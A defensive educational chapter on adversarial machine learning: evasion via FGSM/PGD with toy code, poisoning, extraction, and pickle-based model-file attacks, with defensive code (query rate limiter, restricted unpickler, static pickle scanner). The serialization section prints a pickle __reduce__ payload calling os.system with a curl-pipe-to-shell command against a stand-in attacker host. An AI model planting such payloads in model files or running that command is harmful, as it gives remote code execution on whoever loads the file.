Adversarial machine learning

This decade of work still governs any classifier in an estate (fraud, malware, vision, biometrics) and underlies the embedding, multimodal, and infrastructure attacks covered later. It divides into five families, each listed here with its canonical example; evasion is worked through below.

Family	Target / asset	Canonical example
Evasion	Inference-time decision	FGSM/PGD perturbations flip a malware or image classifier (Goodfellow; Madry)
Poisoning / backdoor	Training/fine-tune data	BadNets trigger: model behaves normally until it sees the attacker’s cue (Gu)
Extraction	Model IP via API	Rebuild a functional copy from query/response pairs (Tramèr)
Membership inference	Training-set privacy	Was this record used to train? (Shokri)
Model inversion	Training-data reconstruction	Recover representative faces from a recognition model (Fredrikson)

# FGSM: a tiny perturbation in the direction that most increases the model's loss
# flips the prediction while looking unchanged to a human.
# Pixels are scaled to [0, 1]; epsilon is a few intensity levels, e.g. 8/255.
perturbation = epsilon * sign(gradient_of_loss_wrt_input)
adversarial_image = clip(original_image + perturbation, 0, 1)   # stay a valid image
# model(original_image)    -> "stop sign"  (0.98)
# model(adversarial_image) -> "speed limit" (0.91)   visually identical
# DEFENSE: adversarial training (train on such examples), input
# transformation/randomization, and report robustness under PGD, not just FGSM.

That single idea, moving the input along the gradient of the loss, underlies the whole evasion family. Stronger attacks such as PGD iterate the step and project back into the epsilon-ball after each one, and transferability means an attacker can craft the example on a surrogate model and fire it at yours (II.18 covers the text-domain analogue).
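The relationship between the single-step and iterated attack can be sketched on a model small enough to follow by hand. The example below is a minimal illustration, not a reference implementation: it assumes a four-feature logistic-regression "classifier" with made-up weights (W, B) and a made-up input (X), and every function name is hypothetical. With only four features it needs a large epsilon (0.1); real images have thousands of pixels, which is why a few /255 per pixel is enough there.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def predict(w, b, x):
    """Probability of class 1 under a logistic-regression model."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)

def loss_grad_wrt_input(w, b, x, y):
    """Gradient of binary cross-entropy w.r.t. the input: (p - y) * w."""
    p = predict(w, b, x)
    return [(p - y) * wi for wi in w]

def sign(v):
    return (v > 0) - (v < 0)

def clip(v, lo, hi):
    return min(hi, max(lo, v))

def fgsm(w, b, x, y, eps):
    """One step of size eps along the sign of the loss gradient."""
    g = loss_grad_wrt_input(w, b, x, y)
    return [clip(xi + eps * sign(gi), 0.0, 1.0) for xi, gi in zip(x, g)]

def pgd(w, b, x, y, eps, step, iters):
    """Iterated small steps, projected back into the eps-ball around x."""
    x_adv = list(x)
    for _ in range(iters):
        g = loss_grad_wrt_input(w, b, x_adv, y)
        x_adv = [xa + step * sign(gi) for xa, gi in zip(x_adv, g)]
        x_adv = [clip(xa, x0 - eps, x0 + eps) for xa, x0 in zip(x_adv, x)]
        x_adv = [clip(xa, 0.0, 1.0) for xa in x_adv]
    return x_adv

# Illustrative values only (assumptions, not from any real model).
W = [2.0, -3.0, 1.5, -1.0]
B = 0.1
X = [0.6, 0.4, 0.5, 0.45]   # features scaled to [0, 1]
Y = 1                       # true label

x_fgsm = fgsm(W, B, X, Y, eps=0.1)
x_pgd = pgd(W, B, X, Y, eps=0.1, step=0.025, iters=10)
print("clean:", round(predict(W, B, X), 3))
print("fgsm: ", round(predict(W, B, x_fgsm), 3))
print("pgd:  ", round(predict(W, B, x_pgd), 3))
```

On a linear model like this one, PGD ends at the same corner of the epsilon-ball as FGSM; the iterated version only pays off on non-linear models, where the gradient direction changes as the input moves.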

Canon

Goodfellow 2014 — Explaining & Harnessing Adversarial Examples (FGSM) — arXiv:1412.6572
Madry 2017 — Resistance to Adversarial Attacks (PGD) — arXiv:1706.06083
Gu 2017 — BadNets - backdoor attacks — arXiv:1708.06733
Tramèr 2016 — Stealing ML Models via Prediction APIs — USENIX Security

▸ For the organization

Inventory every model making a security or eligibility decision; pen-test it as a tamperable control.
If you fine-tune or run RAG, treat the data pipeline as attacker-reachable: validate sources, sign datasets, test for backdoors before promotion.
Rate-limit and monitor prediction APIs against extraction.
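The rate-limiting control in the last item can be sketched as a per-client sliding-window query budget placed in front of the prediction endpoint. This is a minimal illustration under stated assumptions: the class name QueryBudget, the client identifier, and the limits are all hypothetical, and a production gateway would also log denials and watch for one attacker spreading queries across many accounts.

```python
from collections import defaultdict, deque

class QueryBudget:
    """Sliding-window limit on prediction queries per client (hypothetical helper)."""

    def __init__(self, max_queries, window_seconds):
        self.max_queries = max_queries
        self.window_seconds = window_seconds
        self._history = defaultdict(deque)   # client_id -> timestamps of allowed queries

    def allow(self, client_id, now):
        """Return True and record the query if the client is under budget."""
        timestamps = self._history[client_id]
        # Drop timestamps that have aged out of the window.
        while timestamps and now - timestamps[0] >= self.window_seconds:
            timestamps.popleft()
        if len(timestamps) >= self.max_queries:
            return False                     # over budget: deny and flag for review
        timestamps.append(now)
        return True

budget = QueryBudget(max_queries=3, window_seconds=60)
decisions = [budget.allow("client-a", t) for t in (0, 1, 2, 3)]
print(decisions)   # the fourth query inside the window is denied
```

A budget like this raises the cost of extraction rather than preventing it, so it is best paired with monitoring of query patterns over longer periods.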

Model files are executable: serialization & deserialization attacks

A trained model ships as a file, and the common formats are not inert data - they can run code when loaded. Python’s pickle (used by PyTorch’s torch.load, scikit-learn, and joblib) invokes arbitrary callables during deserialization, and TensorFlow/Keras Lambda layers (including those saved inside HDF5 files) and TorchScript archives carry serialized code rather than just weights. Loading an attacker’s pickle-based model file is therefore arbitrary code execution on the machine that loads it - a supply-chain RCE that needs no exploit, just a routine model.load(). The pickle RCE primitive has been known since 2011; what changed is that model-sharing hubs turned it into a distribution channel.

# When an object is pickled, __reduce__ tells pickle how to rebuild it on load;
# an attacker returns a callable + args, and the "reconstruction" runs their code.
import os

class Payload:
    def __reduce__(self):
        # Executed by pickle.load(), and by torch.load(..., weights_only=False)
        return (os.system, ("curl http://attacker/x | sh",))
# Saved into a .bin/.pt/.pkl model, this executes the moment a victim loads it.
# DEFENSE: never load untrusted pickle; prefer safetensors (weights only, no code);
# torch.load defaults to weights_only=True since PyTorch 2.6; scan in CI before promotion.
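The restricted-loader defense can be illustrated with the standard library alone. The sketch below follows the "restricting globals" pattern from the Python pickle documentation: an Unpickler subclass whose find_class refuses anything outside an allowlist. It is not PyTorch's weights-only implementation, only the same idea in miniature; the allowlist contents, the harmless demo payload (which calls len instead of a shell), and the helper name restricted_loads are assumptions made for illustration.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist: the only global this loader will resolve.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # pickle calls find_class for every global it wants to import.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def restricted_loads(data):
    """Unpickle bytes, refusing any callable outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class HarmlessPayload:
    """Stand-in for a malicious object: 'reconstruction' calls len()."""
    def __reduce__(self):
        return (len, ("payload",))

malicious = pickle.dumps(HarmlessPayload())
benign = pickle.dumps(OrderedDict(weights=[0.1, 0.2]))

print(pickle.loads(malicious))        # plain pickle ran the callable
print(restricted_loads(benign))       # allowlisted container loads normally
try:
    restricted_loads(malicious)
except pickle.UnpicklingError as err:
    print("refused:", err)
```

An allowlist is the safer design here because a blocklist of "dangerous" callables is hard to make complete.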

This is live, not theoretical. JFrog found a Hugging Face model carrying a silent reverse-shell backdoor in 2024; in February 2025 ReversingLabs disclosed nullifAI, where deliberately “broken” pickle files executed a reverse shell while evading Hugging Face’s picklescan. One study tracked a roughly 5× year-over-year rise in malicious model uploads, on a hub where pickle repositories still see billions of downloads a month. Hugging Face scans uploads (ClamAV for malware, picklescan for pickle imports, TruffleHog for secrets) but marks rather than blocks unsafe models - the download-and-run decision is still yours.

Defenses for the model artifact

Prefer safetensors - it encodes only tensor data, no executable opcodes, so the deserialization-RCE class is designed out.
Use restricted loaders - PyTorch’s weights-only unpickler (weights_only=True) is the default from v2.6, refusing arbitrary callables on load.
Scan every third-party model in CI - ModelScan (Protect AI), Fickling (Trail of Bits), and picklescan as a promotion gate before a model reaches a registry.
Treat model files as untrusted executables - sandbox loading of anything unverified, and require provenance/signing before use (§16).
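A CI promotion gate of the kind described above works by reading the pickle opcode stream statically and listing the globals it would import, without ever unpickling. The sketch below shows that idea with the standard-library pickletools module. It is a simplified heuristic and not a substitute for ModelScan, Fickling, or picklescan: the function names, the allowlist, and the memo tracking are assumptions, and the demo payload is deliberately harmless. A stream that fails to parse is treated as unsafe rather than skipped, since the nullifAI files were deliberately broken.

```python
import pickle
import pickletools
from collections import OrderedDict

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
ALLOWED_GLOBALS = {("collections", "OrderedDict")}   # hypothetical allowlist

def scan_pickle(data):
    """Return (imports, parsed_cleanly) for a pickle, without executing it."""
    imports, memo, recent = [], {}, []
    parsed_cleanly = True
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            name = opcode.name
            if name in STRING_OPS:
                recent.append(arg)
            elif name in GET_OPS:
                recent.append(memo.get(arg))
            elif name == "MEMOIZE":
                memo[len(memo)] = recent[-1] if recent else None
            elif name in PUT_OPS:
                memo[arg] = recent[-1] if recent else None
            elif name == "GLOBAL":                 # protocols 0-3: "module name"
                module, _, attr = arg.partition(" ")
                imports.append((module, attr))
                recent.append(None)
            elif name == "STACK_GLOBAL":           # protocol 4+: two strings on the stack
                pair = recent[-2:]
                if len(pair) == 2 and all(isinstance(s, str) for s in pair):
                    imports.append((pair[0], pair[1]))
                else:
                    imports.append(("?", "?"))     # unresolved: treat as suspicious
                recent.append(None)
            else:
                recent.append(None)                # any other value: unknown
    except Exception:
        parsed_cleanly = False                     # malformed stream
    return imports, parsed_cleanly

def is_safe(data):
    imports, parsed_cleanly = scan_pickle(data)
    return parsed_cleanly and all(g in ALLOWED_GLOBALS for g in imports)

class HarmlessPayload:
    """Stand-in for a malicious object: 'reconstruction' calls len()."""
    def __reduce__(self):
        return (len, ("payload",))

suspicious = pickle.dumps(HarmlessPayload())
broken = suspicious[:-1]                           # STOP opcode removed
print(scan_pickle(suspicious))
print(is_safe(pickle.dumps(OrderedDict(w=[0.1, 0.2]))), is_safe(suspicious), is_safe(broken))
```

Static scanning is a gate rather than a guarantee, which is why the list above pairs it with safetensors, restricted loaders, and sandboxed loading.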

Sources

ReversingLabs 2025 — nullifAI - malicious models evading picklescan — reversinglabs.com, Feb 2025
JFrog 2024 — Malicious HF model, silent backdoor — jfrog.com
PyTorch / HF — weights-only unpickler (default v2.6+); safetensors — safe model format